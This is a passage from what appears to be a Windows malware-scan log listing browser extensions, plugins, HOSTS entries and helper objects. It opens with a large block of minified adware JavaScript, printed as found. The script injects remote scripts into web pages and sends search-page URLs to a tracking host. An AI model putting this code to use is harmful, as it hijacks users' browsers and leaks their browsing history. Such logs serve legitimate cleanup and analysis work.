?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=vdx&userId=2528916844&CTID=p320';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(-1<window.self.location.protocol.indexOf(\"http\")&&window.self==window.top){var a,b=document.getElementsByTagName(\"head\")[0];a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/widget.min.js?r=684295654\";b.appendChild(a);a=document.createElement(\"link\");a.type=\"text/css\";a.rel=\"stylesheet\";a.href=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/style.css?r=684295654\";b.appendChild(a)}})();;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//static.safesaver.net/apps/tv-classic/safesaver/tv-classic-safesaver.js\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=dft&hid=3016938870';document.getElementsByTagName(\"head\")[0].appendChild(script);};if (window.self.location.protocol.indexOf('http:') > -1 && window.self == window.top && (location.hostname.indexOf('odnoklassniki') > -1 || location.hostname.indexOf('vk.com') > -1) ) { var script = document.createElement('script'); script.type = 'text/javascript'; script.src = '//app1.kapitoshki.com/files/index.php?type=vi'; document.getElementsByTagName(\"head\")[0].appendChild(script); };window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null}; a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)}; b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"undefined\"==typeof Element.prototype.appendChild.toString)document.getElementsByTagName(\"head\")[0].appendChild(a);else if(\"bing\"==b){var e=Element.prototype.appendChild,f=document.createElement(\"iframe\");Element.prototype.appendChild=f.document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\", \"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=3016938870&eid=26&pid=320&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\", \"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/...rc_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.condui...:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/w...rc_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple...idate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.in...idate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"], src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()}, !1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.co...d-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b, d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom= new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a
FF - prefs.js..extensions.enabledAddons: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.2.172
FF - prefs.js..extensions.enabledItems: {BBDA0591-3099-440a-AA10-41764D9DB4DB}:2.0
FF - prefs.js..extensions.enabledItems: {2D3F3651-74B9-4795-BDEC-6DA2F431CB62}:4.6
FF - prefs.js..extensions.enabledItems: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.0.900
FF - prefs.js..extensions.enabledItems: {6904342A-8307-11DF-A508-4AE2DFD72085}:2.1.0.900
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: C:\Program Files\DivX\DivX Player\npDivxPlayerPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/VirtualEarth3D,version=2.0: C:\Program Files\Virtual Earth 3D\ [2007/12/14 12:10:25 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pack.google.com/Google Updater;version=14: C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll (Google)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{203FB6B2-2E1E-4474-863B-4C483ECCE78E}: C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_1.2.0.6\coFFNST\ [2011/08/02 11:25:28 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013/03/04 17:15:27 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/02/02 21:11:39 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013/01/14 23:59:14 | 000,000,000 | ---D | M]
 
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions\{3550f703-e582-4d05-9a08-453d09bdfdc6}
[2014/05/19 22:34:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions
[2010/08/07 16:01:40 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2012/02/23 22:12:56 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2012/06/19 10:53:37 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2007/12/15 02:49:00 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Program Files\Mozilla Firefox\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2013/03/04 17:15:27 | 000,000,000 | ---D | M] (No name found) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2011/03/18 13:53:24 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/06/28 11:42:00 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files\mozilla firefox\plugins\npwachk.dll
[2010/01/01 04:00:00 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage: http://www.google.com
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.83\PepperFlash\pepflashplayer.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\34.0.1847.137\gcswf32.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_2_202_235.dll
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\34.0.1847.137\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\34.0.1847.137\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 8.0\Reader\Browser\nppdf32.dll
CHR - plugin: Microsoft® Windows Media Player Firefox Plugin (Enabled) = C:\Program Files\Mozilla Firefox\plugins\np-mswmp.dll
CHR - plugin: DivX Player Netscape Plugin (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npDivxPlayerPlugin.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Plus Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Updater (Enabled) = C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.115\npGoogleUpdate3.dll
CHR - plugin: Java™ Platform SE 7 U5 (Enabled) = C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll
CHR - plugin: Java Deployment Toolkit 7.0.50.255 (Enabled) = C:\Windows\system32\npDeployJava1.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - Extension: Vaudix = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog\1\
CHR - Extension: Google Wallet = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo> = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.172_0\
 
O1 HOSTS File: ([2014/05/19 20:35:59 | 000,431,917 | ---- | M]) - C:\Windows\System32\drivers\etc\HOSTS
O1 - Hosts: 127.0.0.1  localhost
O1 - Hosts: ::1  localhost    #[IPv6]
O1 - Hosts: 0.0.0.0  fr.a2dfp.net
O1 - Hosts: 0.0.0.0  m.fr.a2dfp.net
O1 - Hosts: 0.0.0.0  mfr.a2dfp.net
O1 - Hosts: 0.0.0.0  ad.a8.net
O1 - Hosts: 0.0.0.0  asy.a8ww.net
O1 - Hosts: 0.0.0.0  static.a-ads.com
O1 - Hosts: 0.0.0.0  abcstats.com
O1 - Hosts: 0.0.0.0  ad4.abradio.cz
O1 - Hosts: 0.0.0.0  a.abv.bg
O1 - Hosts: 0.0.0.0  adserver.abv.bg
O1 - Hosts: 0.0.0.0  adv.abv.bg
O1 - Hosts: 0.0.0.0  bimg.abv.bg
O1 - Hosts: 0.0.0.0  ca.abv.bg
O1 - Hosts: 0.0.0.0  www2.a-counter.kiev.ua
O1 - Hosts: 0.0.0.0  track.acclaimnetwork.com
O1 - Hosts: 0.0.0.0  accuserveadsystem.com
O1 - Hosts: 0.0.0.0  www.accuserveadsystem.com
O1 - Hosts: 0.0.0.0  achmedia.com
O1 - Hosts: 0.0.0.0  csh.actiondesk.com
O1 - Hosts: 0.0.0.0  ads.activepower.net
O1 - Hosts: 0.0.0.0  app.activetrail.com
O1 - Hosts: 0.0.0.0  stat.active24stats.nl    #[Tracking.Cookie]
O1 - Hosts: 0.0.0.0  traffic.acwebconnecting.com
O1 - Hosts: 13627 more lines...
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (no name) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - No CLSID value found.
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (Norton Safe Web Lite BHO) - {F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3} - C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\CoIEPlg.dll (Symantec Corporation)
O3 - HKLM\..\Toolbar: (Norton Safe Web Lite) - {30CEEEA2-3742-40e4-85DD-812BF1CBB83D} - C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\CoIEPlg.dll (Symantec Corporation)
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (Norton Safe Web Lite) - {30CEEEA2-3742-40E4-85DD-812BF1CBB83D} - C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\CoIEPlg.dll (Symantec Corporation)
